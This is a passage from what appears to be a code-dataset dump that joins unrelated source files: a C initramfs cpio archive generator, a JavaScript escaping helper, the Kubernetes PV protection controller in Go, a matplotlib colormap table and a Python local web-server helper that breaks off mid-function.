	return cpio_mkgeneric_line(line, GT_DIR);
}
/* "pipe" line handler: thin wrapper selecting GT_PIPE. */
static int cpio_mkpipe_line(const char *line)
{
	return cpio_mkgeneric_line(line, GT_PIPE);
}
/* "sock" line handler: thin wrapper selecting GT_SOCK. */
static int cpio_mksock_line(const char *line)
{
	return cpio_mkgeneric_line(line, GT_SOCK);
}
/*
 * Emit a device-node entry. dev_type 'b' selects a block device; anything
 * else is treated as a character device. maj/min become rmajor/rminor in
 * the header. Returns 0 on success, -1 on I/O failure.
 */
static int cpio_mknod(const char *name, unsigned int mode,
		      uid_t uid, gid_t gid, char dev_type,
		      unsigned int maj, unsigned int min)
{
	int len;
	unsigned int namesize;

	if (dev_type == 'b')
		mode |= S_IFBLK;
	else
		mode |= S_IFCHR;

	/* Archive paths are relative: drop a leading '/'. */
	if (name[0] == '/')
		name++;
	namesize = strlen(name) + 1;
	len = dprintf(outfd, "%s%08X%08X%08lX%08lX%08X%08lX"
		"%08X%08X%08X%08X%08X%08X%08X",
		do_csum ? "070702" : "070701", /* magic */
		ino++,			/* ino */
		mode,			/* mode */
		(long) uid,		/* uid */
		(long) gid,		/* gid */
		1,			/* nlink */
		(long) default_mtime,	/* mtime */
		0,			/* filesize */
		3,			/* major */
		1,			/* minor */
		maj,			/* rmajor */
		min,			/* rminor */
		namesize,		/* namesize */
		0);			/* chksum */
	offset += len;

	if (len != CPIO_HDR_LEN ||
	    push_rest(name, namesize) < 0)
		return -1;
	return 0;
}
/*
 * Parse "nod <name> <mode> <uid> <gid> <dev_type> <maj> <min>" and emit
 * the device-node entry. Returns 0 on success, -1 on error.
 */
static int cpio_mknod_line(const char *line)
{
	char name[PATH_MAX + 1];
	unsigned int mode;
	int uid;
	int gid;
	char dev_type;
	unsigned int maj;
	unsigned int min;
	int rc = -1;

	if (7 != sscanf(line, "%" str(PATH_MAX) "s %o %d %d %c %u %u",
			name, &mode, &uid, &gid, &dev_type, &maj, &min)) {
		fprintf(stderr, "Unrecognized nod format '%s'", line);
		goto fail;
	}
	rc = cpio_mknod(name, mode, uid, gid, dev_type, maj, min);
 fail:
	return rc;
}
/*
 * Accumulate the byte-sum of `size` bytes from fd into *csum (32-bit
 * wraparound — the newc "070702" checksum), then rewind the fd so the
 * data can be copied into the archive afterwards.
 * Returns 0 on success, -1 on read/seek failure.
 */
static int cpio_mkfile_csum(int fd, unsigned long size, uint32_t *csum)
{
	while (size) {
		unsigned char filebuf[65536];
		ssize_t this_read;
		size_t i, this_size = MIN(size, sizeof(filebuf));

		this_read = read(fd, filebuf, this_size);
		if (this_read <= 0 || this_read > this_size)
			return -1;

		for (i = 0; i < this_read; i++)
			*csum += filebuf[i];

		size -= this_read;
	}
	/* seek back to the start for data segment I/O */
	if (lseek(fd, 0, SEEK_SET) < 0)
		return -1;

	return 0;
}
/*
 * Emit a regular-file entry (plus any hard links). `name` holds `nlinks`
 * consecutive NUL-terminated names; the file data is attached to the LAST
 * link's record, optionally zero-padding the filename field so the data
 * lands on a `dalign` boundary. Returns 0 on success, -1 on error.
 */
static int cpio_mkfile(const char *name, const char *location,
		       unsigned int mode, uid_t uid, gid_t gid,
		       unsigned int nlinks)
{
	struct stat buf;
	unsigned long size;
	int file, retval, len;
	int rc = -1;
	time_t mtime;
	int namesize, namepadlen;
	unsigned int i;
	uint32_t csum = 0;
	ssize_t this_read;

	mode |= S_IFREG;

	file = open (location, O_RDONLY);
	if (file < 0) {
		fprintf (stderr, "File %s could not be opened for reading\n", location);
		goto error;
	}

	retval = fstat(file, &buf);
	if (retval) {
		fprintf(stderr, "File %s could not be stat()'ed\n", location);
		goto error;
	}

	if (do_file_mtime) {
		mtime = default_mtime;
	} else {
		/* Clip the source mtime into the 32-bit cpio range. */
		mtime = buf.st_mtime;
		if (mtime > 0xffffffff) {
			fprintf(stderr, "%s: Timestamp exceeds maximum cpio timestamp, clipping.\n",
				location);
			mtime = 0xffffffff;
		}

		if (mtime < 0) {
			fprintf(stderr, "%s: Timestamp negative, clipping.\n",
				location);
			mtime = 0;
		}
	}

	if (buf.st_size > 0xffffffff) {
		fprintf(stderr, "%s: Size exceeds maximum cpio file size\n",
			location);
		goto error;
	}

	if (do_csum && cpio_mkfile_csum(file, buf.st_size, &csum) < 0) {
		fprintf(stderr, "Failed to checksum file %s\n", location);
		goto error;
	}

	size = 0;
	namepadlen = 0;
	for (i = 1; i <= nlinks; i++) {
		/* Archive paths are relative: drop a leading '/'. */
		if (name[0] == '/')
			name++;
		namesize = strlen(name) + 1;
		/* data goes on last link, after any alignment padding */
		if (i == nlinks)
			size = buf.st_size;
		if (dalign && size > dalign) {
			namepadlen = padlen(offset + CPIO_HDR_LEN + namesize,
					    dalign);
			/* padding can't push namesize past PATH_MAX */
			if (namesize + namepadlen > PATH_MAX) {
				fprintf(stderr,
					"%s: best-effort alignment %u missed\n",
					name, dalign);
				namepadlen = 0;
			}
		}

		len = dprintf(outfd, "%s%08X%08X%08lX%08lX%08X%08lX"
			"%08lX%08X%08X%08X%08X%08X%08X",
			do_csum ? "070702" : "070701", /* magic */
			ino,			/* ino */
			mode,			/* mode */
			(long) uid,		/* uid */
			(long) gid,		/* gid */
			nlinks,			/* nlink */
			(long) mtime,		/* mtime */
			size,			/* filesize */
			3,			/* major */
			1,			/* minor */
			0,			/* rmajor */
			0,			/* rminor */
			namesize + namepadlen,	/* namesize */
			size ? csum : 0);	/* chksum */
		offset += len;

		if (len != CPIO_HDR_LEN ||
		    push_buf(name, namesize) < 0 ||
		    push_pad(namepadlen ? namepadlen : padlen(offset, 4)) < 0)
			goto error;

		if (size) {
			/* Try an in-kernel copy first. */
			this_read = copy_file_range(file, NULL, outfd, NULL, size, 0);
			if (this_read > 0) {
				if (this_read > size)
					goto error;
				offset += this_read;
				size -= this_read;
			}
			/* short or failed copy falls back to read/write... */
		}
		while (size) {
			unsigned char filebuf[65536];
			size_t this_size = MIN(size, sizeof(filebuf));

			this_read = read(file, filebuf, this_size);
			if (this_read <= 0 || this_read > this_size) {
				fprintf(stderr, "Can not read %s file\n", location);
				goto error;
			}
			if (write(outfd, filebuf, this_read) != this_read) {
				fprintf(stderr, "writing filebuf failed\n");
				goto error;
			}
			offset += this_read;
			size -= this_read;
		}
		if (push_pad(padlen(offset, 4)) < 0)
			goto error;

		/* Advance to the next link name in the packed buffer. */
		name += namesize;
	}
	ino++;
	rc = 0;

error:
	if (file >= 0)
		close(file);
	return rc;
}
/*
 * Expand every ${VAR} reference in new_location in place (unset variables
 * expand to the empty string) and return the same buffer.
 */
static char *cpio_replace_env(char *new_location)
{
	char expanded[PATH_MAX + 1];
	char *open_ref, *close_ref, *value;

	for (;;) {
		open_ref = strstr(new_location, "${");
		if (!open_ref)
			break;
		close_ref = strchr(open_ref + 2, '}');
		if (!close_ref)
			break;
		/* Split the string around the reference, look it up, rejoin. */
		*open_ref = 0;
		*close_ref = 0;
		value = getenv(open_ref + 2);
		snprintf(expanded, sizeof expanded, "%s%s%s",
			 new_location, value ? value : "", close_ref + 1);
		strcpy(new_location, expanded);
	}

	return new_location;
}
/*
 * Parse "file <name> <location> <mode> <uid> <gid> [<hard links>...]".
 * Extra names after the gid are hard links; they are packed back-to-back
 * (NUL-separated) into one malloc'ed buffer passed to cpio_mkfile().
 * Returns 0 on success, -1 on error.
 */
static int cpio_mkfile_line(const char *line)
{
	char name[PATH_MAX + 1];
	char *dname = NULL; /* malloc'ed buffer for hard links */
	char location[PATH_MAX + 1];
	unsigned int mode;
	int uid;
	int gid;
	int nlinks = 1;
	int end = 0, dname_len = 0;
	int rc = -1;

	if (5 > sscanf(line, "%" str(PATH_MAX) "s %" str(PATH_MAX)
			"s %o %d %d %n",
			name, location, &mode, &uid, &gid, &end)) {
		fprintf(stderr, "Unrecognized file format '%s'", line);
		goto fail;
	}
	if (end && isgraph(line[end])) {
		int len;
		int nend;

		/* strlen(line) bounds the total of all packed names. */
		dname = malloc(strlen(line));
		if (!dname) {
			fprintf (stderr, "out of memory (%d)\n", dname_len);
			goto fail;
		}

		dname_len = strlen(name) + 1;
		memcpy(dname, name, dname_len);

		/* Append each additional link name after the first. */
		do {
			nend = 0;
			if (sscanf(line + end, "%" str(PATH_MAX) "s %n",
					name, &nend) < 1)
				break;
			len = strlen(name) + 1;
			memcpy(dname + dname_len, name, len);
			dname_len += len;
			nlinks++;
			end += nend;
		} while (isgraph(line[end]));
	} else {
		dname = name;
	}

	rc = cpio_mkfile(dname, cpio_replace_env(location),
	                 mode, uid, gid, nlinks);
 fail:
	/* dname_len is nonzero only when dname was malloc'ed. */
	if (dname_len) free(dname);
	return rc;
}
/* Print command-line help plus the cpio_list file-format reference. */
static void usage(const char *prog)
{
	fprintf(stderr, "Usage:\n"
		"\t%s [-t <timestamp>] [-c] [-o <output_file>] [-a <data_align>] <cpio_list>\n"
		"\n"
		"<cpio_list> is a file containing newline separated entries that\n"
		"describe the files to be included in the initramfs archive:\n"
		"\n"
		"# a comment\n"
		"file <name> <location> <mode> <uid> <gid> [<hard links>]\n"
		"dir <name> <mode> <uid> <gid>\n"
		"nod <name> <mode> <uid> <gid> <dev_type> <maj> <min>\n"
		"slink <name> <target> <mode> <uid> <gid>\n"
		"pipe <name> <mode> <uid> <gid>\n"
		"sock <name> <mode> <uid> <gid>\n"
		"\n"
		"<name> name of the file/dir/nod/etc in the archive\n"
		"<location> location of the file in the current filesystem\n"
		" expands shell variables quoted with ${}\n"
		"<target> link target\n"
		"<mode> mode/permissions of the file\n"
		"<uid> user id (0=root)\n"
		"<gid> group id (0=root)\n"
		"<dev_type> device type (b=block, c=character)\n"
		"<maj> major number of nod\n"
		"<min> minor number of nod\n"
		"<hard links> space separated list of other links to file\n"
		"\n"
		"example:\n"
		"# A simple initramfs\n"
		"dir /dev 0755 0 0\n"
		"nod /dev/console 0600 0 0 c 5 1\n"
		"dir /root 0700 0 0\n"
		"dir /sbin 0755 0 0\n"
		"file /sbin/kinit /usr/src/klibc/kinit/kinit 0755 0 0\n"
		"\n"
		"<timestamp> is time in seconds since Epoch that will be used\n"
		"as mtime for symlinks, directories, regular and special files.\n"
		"The default is to use the current time for all files, but\n"
		"preserve modification time for regular files.\n"
		"-c: calculate and store 32-bit checksums for file data.\n"
		"<output_file>: write cpio to this file instead of stdout\n"
		"<data_align>: attempt to align file data by zero-padding the\n"
		"filename field up to data_align. Must be a multiple of 4.\n"
		"Alignment is best-effort; PATH_MAX limits filename padding.\n",
		prog);
}
/* Dispatch table: maps cpio_list entry keywords to their line parsers.
 * NULL-terminated so the lookup loop in main() can detect unknown types. */
static const struct file_handler file_handler_table[] = {
	{
		.type    = "file",
		.handler = cpio_mkfile_line,
	}, {
		.type    = "nod",
		.handler = cpio_mknod_line,
	}, {
		.type    = "dir",
		.handler = cpio_mkdir_line,
	}, {
		.type    = "slink",
		.handler = cpio_mkslink_line,
	}, {
		.type    = "pipe",
		.handler = cpio_mkpipe_line,
	}, {
		.type    = "sock",
		.handler = cpio_mksock_line,
	}, {
		.type    = NULL,
		.handler = NULL,
	}
};

/* Worst-case cpio_list line: two PATH_MAX names plus numeric fields. */
#define LINE_SIZE (2 * PATH_MAX + 50)
/*
 * Entry point: parse options, read the cpio_list file (or stdin for "-"),
 * dispatch each line to its handler, and finish with the archive trailer.
 */
int main (int argc, char *argv[])
{
	FILE *cpio_list;
	char line[LINE_SIZE];
	char *args, *type;
	int ec = 0;
	int line_nr = 0;
	const char *filename;

	default_mtime = time(NULL);
	while (1) {
		int opt = getopt(argc, argv, "t:cho:a:");
		char *invalid;

		if (opt == -1)
			break;
		switch (opt) {
		case 't':
			/* Fixed mtime applied to every entry, files included. */
			default_mtime = strtol(optarg, &invalid, 10);
			if (!*optarg || *invalid) {
				fprintf(stderr, "Invalid timestamp: %s\n",
					optarg);
				usage(argv[0]);
				exit(1);
			}
			do_file_mtime = true;
			break;
		case 'c':
			do_csum = true;
			break;
		case 'o':
			outfd = open(optarg,
				     O_WRONLY | O_CREAT | O_LARGEFILE | O_TRUNC,
				     0600);
			if (outfd < 0) {
				fprintf(stderr, "failed to open %s\n", optarg);
				usage(argv[0]);
				exit(1);
			}
			break;
		case 'a':
			/* Data alignment must be a nonzero multiple of 4. */
			dalign = strtoul(optarg, &invalid, 10);
			if (!*optarg || *invalid || (dalign & 3)) {
				fprintf(stderr, "Invalid data_align: %s\n",
					optarg);
				usage(argv[0]);
				exit(1);
			}
			break;
		case 'h':
		case '?':
			usage(argv[0]);
			exit(opt == 'h' ? 0 : 1);
		}
	}

	/*
	 * Timestamps after 2106-02-07 06:28:15 UTC have an ascii hex time_t
	 * representation that exceeds 8 chars and breaks the cpio header
	 * specification. Negative timestamps similarly exceed 8 chars.
	 */
	if (default_mtime > 0xffffffff || default_mtime < 0) {
		fprintf(stderr, "ERROR: Timestamp out of range for cpio format\n");
		exit(1);
	}

	if (argc - optind != 1) {
		usage(argv[0]);
		exit(1);
	}
	filename = argv[optind];
	if (!strcmp(filename, "-"))
		cpio_list = stdin;
	else if (!(cpio_list = fopen(filename, "r"))) {
		fprintf(stderr, "ERROR: unable to open '%s': %s\n\n",
			filename, strerror(errno));
		usage(argv[0]);
		exit(1);
	}

	while (fgets(line, LINE_SIZE, cpio_list)) {
		int type_idx;
		size_t slen = strlen(line);

		line_nr++;

		if ('#' == *line) {
			/* comment - skip to next line */
			continue;
		}

		/* strtok splits off the type keyword; `line` now holds it. */
		if (! (type = strtok(line, " \t"))) {
			fprintf(stderr,
				"ERROR: incorrect format, could not locate file type line %d: '%s'\n",
				line_nr, line);
			ec = -1;
			break;
		}

		if ('\n' == *type) {
			/* a blank line */
			continue;
		}

		if (slen == strlen(type)) {
			/* must be an empty line */
			continue;
		}

		if (! (args = strtok(NULL, "\n"))) {
			fprintf(stderr,
				"ERROR: incorrect format, newline required line %d: '%s'\n",
				line_nr, line);
			ec = -1;
		}

		for (type_idx = 0; file_handler_table[type_idx].type; type_idx++) {
			int rc;
			if (! strcmp(line, file_handler_table[type_idx].type)) {
				if ((rc = file_handler_table[type_idx].handler(args))) {
					ec = rc;
					fprintf(stderr, " line %d\n", line_nr);
				}
				break;
			}
		}

		if (NULL == file_handler_table[type_idx].type) {
			fprintf(stderr, "unknown file type line %d: '%s'\n",
				line_nr, line);
		}
	}
	/* Only emit the trailer when every line was handled cleanly. */
	if (ec == 0)
		ec = cpio_trailer();

	exit(ec);
}
/**
 * Escape backticks, `${` sequences and backslashes so the string can be
 * embedded safely inside a generated template literal.
 * @param {string} str
 * @returns {string}
 */
export function sanitize_template_string(str) {
	return str.replace(/`|\$\{|\\/g, (match) => '\\' + match);
}
/*
Copyright 2018 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package pvprotection
import (
"context"
"fmt"
"sync"
"time"
v1 "k8s.io/api/core/v1"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
utilruntime "k8s.io/apimachinery/pkg/util/runtime"
"k8s.io/apimachinery/pkg/util/wait"
coreinformers "k8s.io/client-go/informers/core/v1"
clientset "k8s.io/client-go/kubernetes"
corelisters "k8s.io/client-go/listers/core/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/util/workqueue"
"k8s.io/klog/v2"
"k8s.io/kubernetes/pkg/controller/volume/protectionutil"
"k8s.io/kubernetes/pkg/util/slice"
volumeutil "k8s.io/kubernetes/pkg/volume/util"
)
// Controller is controller that removes PVProtectionFinalizer
// from PVs that are not bound to PVCs.
type Controller struct {
client clientset.Interface
pvLister corelisters.PersistentVolumeLister
pvListerSynced cache.InformerSynced
queue workqueue.TypedRateLimitingInterface[string]
}
// NewPVProtectionController returns a new *Controller.
func NewPVProtectionController(logger klog.Logger, pvInformer coreinformers.PersistentVolumeInformer, cl clientset.Interface) *Controller {
e := &Controller{
client: cl,
queue: workqueue.NewTypedRateLimitingQueueWithConfig(
workqueue.DefaultTypedControllerRateLimiter[string](),
workqueue.TypedRateLimitingQueueConfig[string]{Name: "pvprotection"},
),
}
e.pvLister = pvInformer.Lister()
e.pvListerSynced = pvInformer.Informer().HasSynced
pvInformer.Informer().AddEventHandler(cache.ResourceEventHandlerFuncs{
AddFunc: func(obj interface{}) {
e.pvAddedUpdated(logger, obj)
},
UpdateFunc: func(old, new interface{}) {
e.pvAddedUpdated(logger, new)
},
})
return e
}
// Run runs the controller goroutines.
func (c *Controller) Run(ctx context.Context, workers int) {
defer utilruntime.HandleCrash()
logger := klog.FromContext(ctx)
logger.Info("Starting PV protection controller")
var wg sync.WaitGroup
defer func() {
logger.Info("Shutting down PV protection controller")
c.queue.ShutDown()
wg.Wait()
}()
if !cache.WaitForNamedCacheSyncWithContext(ctx, c.pvListerSynced) {
return
}
for i := 0; i < workers; i++ {
wg.Go(func() {
wait.UntilWithContext(ctx, c.runWorker, time.Second)
})
}
<-ctx.Done()
}
func (c *Controller) runWorker(ctx context.Context) {
for c.processNextWorkItem(ctx) {
}
}
// processNextWorkItem deals with one pvcKey off the queue. It returns false when it's time to quit.
func (c *Controller) processNextWorkItem(ctx context.Context) bool {
pvKey, quit := c.queue.Get()
if quit {
return false
}
defer c.queue.Done(pvKey)
pvName := pvKey
err := c.processPV(ctx, pvName)
if err == nil {
c.queue.Forget(pvKey)
return true
}
utilruntime.HandleError(fmt.Errorf("PV %v failed with : %v", pvKey, err))
c.queue.AddRateLimited(pvKey)
return true
}
func (c *Controller) processPV(ctx context.Context, pvName string) error {
logger := klog.FromContext(ctx)
logger.V(4).Info("Processing PV", "PV", klog.KRef("", pvName))
startTime := time.Now()
defer func() {
logger.V(4).Info("Finished processing PV", "PV", klog.KRef("", pvName), "cost", time.Since(startTime))
}()
pv, err := c.pvLister.Get(pvName)
if apierrors.IsNotFound(err) {
logger.V(4).Info("PV not found, ignoring", "PV", klog.KRef("", pvName))
return nil
}
if err != nil {
return err
}
if protectionutil.IsDeletionCandidate(pv, volumeutil.PVProtectionFinalizer) {
// PV should be deleted. Check if it's used and remove finalizer if
// it's not.
isUsed := c.isBeingUsed(pv)
if !isUsed {
return c.removeFinalizer(ctx, pv)
}
logger.V(4).Info("Keeping PV because it is being used", "PV", klog.KRef("", pvName))
}
if protectionutil.NeedToAddFinalizer(pv, volumeutil.PVProtectionFinalizer) {
// PV is not being deleted -> it should have the finalizer. The
// finalizer should be added by admission plugin, this is just to add
// the finalizer to old PVs that were created before the admission
// plugin was enabled.
return c.addFinalizer(ctx, pv)
}
return nil
}
func (c *Controller) addFinalizer(ctx context.Context, pv *v1.PersistentVolume) error {
pvClone := pv.DeepCopy()
pvClone.ObjectMeta.Finalizers = append(pvClone.ObjectMeta.Finalizers, volumeutil.PVProtectionFinalizer)
_, err := c.client.CoreV1().PersistentVolumes().Update(ctx, pvClone, metav1.UpdateOptions{})
logger := klog.FromContext(ctx)
if err != nil {
logger.V(3).Info("Error adding protection finalizer to PV", "PV", klog.KObj(pv), "err", err)
return err
}
logger.V(3).Info("Added protection finalizer to PV", "PV", klog.KObj(pv))
return nil
}
func (c *Controller) removeFinalizer(ctx context.Context, pv *v1.PersistentVolume) error {
pvClone := pv.DeepCopy()
pvClone.ObjectMeta.Finalizers = slice.RemoveString(pvClone.ObjectMeta.Finalizers, volumeutil.PVProtectionFinalizer, nil)
_, err := c.client.CoreV1().PersistentVolumes().Update(ctx, pvClone, metav1.UpdateOptions{})
logger := klog.FromContext(ctx)
if err != nil {
logger.V(3).Info("Error removing protection finalizer from PV", "PV", klog.KObj(pv), "err", err)
return err
}
logger.V(3).Info("Removed protection finalizer from PV", "PV", klog.KObj(pv))
return nil
}
func (c *Controller) isBeingUsed(pv *v1.PersistentVolume) bool {
// check if PV is being bound to a PVC by its status
// the status will be updated by PV controller
if pv.Status.Phase == v1.VolumeBound {
// the PV is being used now
return true
}
return false
}
// pvAddedUpdated reacts to pv added/updated events
func (c *Controller) pvAddedUpdated(logger klog.Logger, obj interface{}) {
pv, ok := obj.(*v1.PersistentVolume)
if !ok {
utilruntime.HandleError(fmt.Errorf("PV informer returned non-PV object: %#v", obj))
return
}
logger.V(4).Info("Got event on PV", "PV", klog.KObj(pv))
if protectionutil.NeedToAddFinalizer(pv, volumeutil.PVProtectionFinalizer) || protectionutil.IsDeletionCandidate(pv, volumeutil.PVProtectionFinalizer) {
c.queue.Add(pv.Name)
}
} | go | github | https://github.com/kubernetes/kubernetes | pkg/controller/volume/pvprotection/pv_protection_controller.go |
from matplotlib.colors import LinearSegmentedColormap
from numpy import nan, inf
cm_data = [[0., 0., 0.],
[0.0156863, 0., 0.0117647],
[0.0352941, 0., 0.027451],
[0.0509804, 0., 0.0392157],
[0.0705882, 0., 0.054902],
[0.0862745, 0., 0.0745098],
[0.105882, 0., 0.0901961],
[0.121569, 0., 0.109804],
[0.141176, 0., 0.12549],
[0.156863, 0., 0.14902],
[0.176471, 0., 0.168627],
[0.196078, 0., 0.188235],
[0.227451, 0., 0.231373],
[0.239216, 0., 0.247059],
[0.25098, 0., 0.266667],
[0.266667, 0., 0.282353],
[0.270588, 0., 0.301961],
[0.282353, 0., 0.317647],
[0.290196, 0., 0.337255],
[0.301961, 0., 0.356863],
[0.309804, 0., 0.372549],
[0.313725, 0., 0.392157],
[0.321569, 0., 0.407843],
[0.32549, 0., 0.427451],
[0.329412, 0., 0.462745],
[0.337255, 0., 0.478431],
[0.341176, 0., 0.498039],
[0.345098, 0., 0.517647],
[0.337255, 0., 0.533333],
[0.341176, 0., 0.552941],
[0.341176, 0., 0.568627],
[0.341176, 0., 0.588235],
[0.333333, 0., 0.603922],
[0.329412, 0., 0.623529],
[0.329412, 0., 0.639216],
[0.329412, 0., 0.658824],
[0.309804, 0., 0.694118],
[0.305882, 0., 0.713725],
[0.301961, 0., 0.729412],
[0.298039, 0., 0.74902],
[0.278431, 0., 0.764706],
[0.27451, 0., 0.784314],
[0.266667, 0., 0.8],
[0.258824, 0., 0.819608],
[0.235294, 0., 0.839216],
[0.227451, 0., 0.854902],
[0.215686, 0., 0.87451],
[0.180392, 0., 0.909804],
[0.168627, 0., 0.92549],
[0.156863, 0., 0.945098],
[0.141176, 0., 0.960784],
[0.129412, 0., 0.980392],
[0.0980392, 0., 1.],
[0.0823529, 0., 1.],
[0.0627451, 0., 1.],
[0.0470588, 0., 1.],
[0.0156863, 0., 1.],
[0., 0., 1.],
[0., 0.0156863, 1.],
[0., 0.0627451, 1.],
[0., 0.0823529, 1.],
[0., 0.0980392, 1.],
[0., 0.113725, 1.],
[0., 0.14902, 1.],
[0., 0.164706, 1.],
[0., 0.180392, 1.],
[0., 0.2, 1.],
[0., 0.215686, 1.],
[0., 0.247059, 1.],
[0., 0.262745, 1.],
[0., 0.282353, 1.],
[0., 0.329412, 1.],
[0., 0.34902, 1.],
[0., 0.364706, 1.],
[0., 0.380392, 1.],
[0., 0.415686, 1.],
[0., 0.431373, 1.],
[0., 0.447059, 1.],
[0., 0.466667, 1.],
[0., 0.498039, 1.],
[0., 0.513725, 1.],
[0., 0.529412, 1.],
[0., 0.54902, 1.],
[0., 0.596078, 1.],
[0., 0.615686, 1.],
[0., 0.631373, 1.],
[0., 0.647059, 1.],
[0., 0.682353, 1.],
[0., 0.698039, 1.],
[0., 0.713725, 1.],
[0., 0.733333, 1.],
[0., 0.764706, 1.],
[0., 0.780392, 1.],
[0., 0.796078, 1.],
[0., 0.847059, 1.],
[0., 0.862745, 1.],
[0., 0.882353, 1.],
[0., 0.898039, 1.],
[0., 0.913725, 1.],
[0., 0.94902, 1.],
[0., 0.964706, 1.],
[0., 0.980392, 1.],
[0., 1., 1.],
[0., 1., 0.964706],
[0., 1., 0.94902],
[0., 1., 0.933333],
[0., 1., 0.882353],
[0., 1., 0.862745],
[0., 1., 0.847059],
[0., 1., 0.831373],
[0., 1., 0.796078],
[0., 1., 0.780392],
[0., 1., 0.764706],
[0., 1., 0.74902],
[0., 1., 0.733333],
[0., 1., 0.698039],
[0., 1., 0.682353],
[0., 1., 0.666667],
[0., 1., 0.615686],
[0., 1., 0.596078],
[0., 1., 0.580392],
[0., 1., 0.564706],
[0., 1., 0.529412],
[0., 1., 0.513725],
[0., 1., 0.498039],
[0., 1., 0.482353],
[0., 1., 0.447059],
[0., 1., 0.431373],
[0., 1., 0.415686],
[0., 1., 0.4],
[0., 1., 0.34902],
[0., 1., 0.329412],
[0., 1., 0.313725],
[0., 1., 0.298039],
[0., 1., 0.262745],
[0., 1., 0.247059],
[0., 1., 0.231373],
[0., 1., 0.215686],
[0., 1., 0.180392],
[0., 1., 0.164706],
[0., 1., 0.14902],
[0., 1., 0.0980392],
[0., 1., 0.0823529],
[0., 1., 0.0627451],
[0., 1., 0.0470588],
[0., 1., 0.0313725],
[0., 1., 0.],
[0.0156863, 1., 0.],
[0.0313725, 1., 0.],
[0.0470588, 1., 0.],
[0.0823529, 1., 0.],
[0.0980392, 1., 0.],
[0.113725, 1., 0.],
[0.164706, 1., 0.],
[0.180392, 1., 0.],
[0.2, 1., 0.],
[0.215686, 1., 0.],
[0.247059, 1., 0.],
[0.262745, 1., 0.],
[0.282353, 1., 0.],
[0.298039, 1., 0.],
[0.313725, 1., 0.],
[0.34902, 1., 0.],
[0.364706, 1., 0.],
[0.380392, 1., 0.],
[0.431373, 1., 0.],
[0.447059, 1., 0.],
[0.466667, 1., 0.],
[0.482353, 1., 0.],
[0.513725, 1., 0.],
[0.529412, 1., 0.],
[0.54902, 1., 0.],
[0.564706, 1., 0.],
[0.6, 1., 0.],
[0.615686, 1., 0.],
[0.631373, 1., 0.],
[0.647059, 1., 0.],
[0.698039, 1., 0.],
[0.713725, 1., 0.],
[0.733333, 1., 0.],
[0.74902, 1., 0.],
[0.780392, 1., 0.],
[0.796078, 1., 0.],
[0.815686, 1., 0.],
[0.831373, 1., 0.],
[0.866667, 1., 0.],
[0.882353, 1., 0.],
[0.898039, 1., 0.],
[0.94902, 1., 0.],
[0.964706, 1., 0.],
[0.980392, 1., 0.],
[1., 1., 0.],
[1., 0.980392, 0.],
[1., 0.94902, 0.],
[1., 0.933333, 0.],
[1., 0.913725, 0.],
[1., 0.898039, 0.],
[1., 0.866667, 0.],
[1., 0.847059, 0.],
[1., 0.831373, 0.],
[1., 0.780392, 0.],
[1., 0.764706, 0.],
[1., 0.74902, 0.],
[1., 0.733333, 0.],
[1., 0.698039, 0.],
[1., 0.682353, 0.],
[1., 0.666667, 0.],
[1., 0.647059, 0.],
[1., 0.631373, 0.],
[1., 0.6, 0.],
[1., 0.580392, 0.],
[1., 0.564706, 0.],
[1., 0.513725, 0.],
[1., 0.498039, 0.],
[1., 0.482353, 0.],
[1., 0.466667, 0.],
[1., 0.431373, 0.],
[1., 0.415686, 0.],
[1., 0.4, 0.],
[1., 0.380392, 0.],
[1., 0.34902, 0.],
[1., 0.333333, 0.],
[1., 0.313725, 0.],
[1., 0.298039, 0.],
[1., 0.247059, 0.],
[1., 0.231373, 0.],
[1., 0.215686, 0.],
[1., 0.2, 0.],
[1., 0.164706, 0.],
[1., 0.14902, 0.],
[1., 0.133333, 0.],
[1., 0.113725, 0.],
[1., 0.0823529, 0.],
[1., 0.0666667, 0.],
[1., 0.0470588, 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 0., 0.],
[1., 1., 1.]]
test_cm = LinearSegmentedColormap.from_list(__file__, cm_data)
if __name__ == "__main__":
import matplotlib.pyplot as plt
import numpy as np
try:
from pycam02ucs.cm.viscm import viscm
viscm(test_cm)
except ImportError:
print("pycam02ucs not found, falling back on simple display")
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto',
cmap=test_cm)
plt.show() | unknown | codeparrot/codeparrot-clean | ||
# helper to load url
# runs webserver and loads url with webbrowswer module
import sys
def load_url(path):
PORT = 8000
httpd = StoppableHTTPServer(("127.0.0.1",PORT), handler)
thread.start_new_thread(httpd.serve, ())
webbrowser.open_new('http://localhost:%s/%s'%(PORT,path))
input("Press <RETURN> to stop server\n")
httpd.stop()
print("To restart server run: \n%s"%server)
if sys.version_info[0] == 2:
import SimpleHTTPServer, BaseHTTPServer
import socket
import thread
import webbrowser
handler = SimpleHTTPServer.SimpleHTTPRequestHandler
input = raw_input
server = "python -m SimpleHTTPServer 8000"
class StoppableHTTPServer(BaseHTTPServer.HTTPServer):
def server_bind(self):
BaseHTTPServer.HTTPServer.server_bind(self)
self.socket.settimeout(1)
self.run = True
def get_request(self):
while self.run:
try:
sock, addr = self.socket.accept()
sock.settimeout(None)
return (sock, addr)
except socket.timeout:
pass
def stop(self):
self.run = False
def serve(self):
while self.run:
self.handle_request()
else:
import http.server, http.server
import socket
import _thread as thread
import webbrowser
handler = http.server.SimpleHTTPRequestHandler
server = "python -m http.server 8000"
class StoppableHTTPServer(http.server.HTTPServer):
def server_bind(self):
http.server.HTTPServer.server_bind(self)
self.socket.settimeout(1)
self.run = True
def get_request(self):
while self.run:
try:
sock, addr = self.socket.accept()
sock.settimeout(None)
return (sock, addr)
except socket.timeout:
pass
def stop(self):
self.run = False
def serve(self):
while self.run:
